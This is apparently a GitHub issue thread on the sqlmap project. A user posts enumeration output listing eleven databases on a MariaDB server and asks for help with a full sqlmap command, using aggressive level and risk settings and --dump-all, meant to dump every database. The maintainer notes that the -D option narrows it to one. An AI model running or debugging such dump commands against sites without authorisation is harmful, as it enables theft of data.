### ISSUE TITLE
All Database dump Auto commands

### ISSUE THREAD

**Issue by lolminerxmrig01** [sqlmapproject/sqlmap#5834]
Hi All
All Database dump Auto Commands
Thanks And Merry Christmas.

web server operating system: Linux Debian
web application technology: Apache 2.4.56
back-end DBMS: MySQL >= 1.7.2 (MariaDB fork)
available databases [11]:
[*] boleti
[*] con
[*] eca
[*] histor
[*] hu
[*] huma
[*] icso
[*] labt
[*] lot
[*] m
[*] wp

**Comment by lolminerxmrig01** [comment]
plz can help me fixed : 
sqlmap -u "https://www.test.com/new/libros.php?lib=1" --random-agent --threads 10 --level=5 --risk=3 --force-ssl --ignore-code=500 -D database --columns --dbs --dump-all --null-connection --keep-alive

not working dump all database only 1 database download.

**Comment by stamparm** [comment]
buy you literary used `-D database` option to narrow down to a single database:

![image](https://github.com/user-attachments/assets/200d7320-5220-441d-9ca0-28ea40d2d89d)
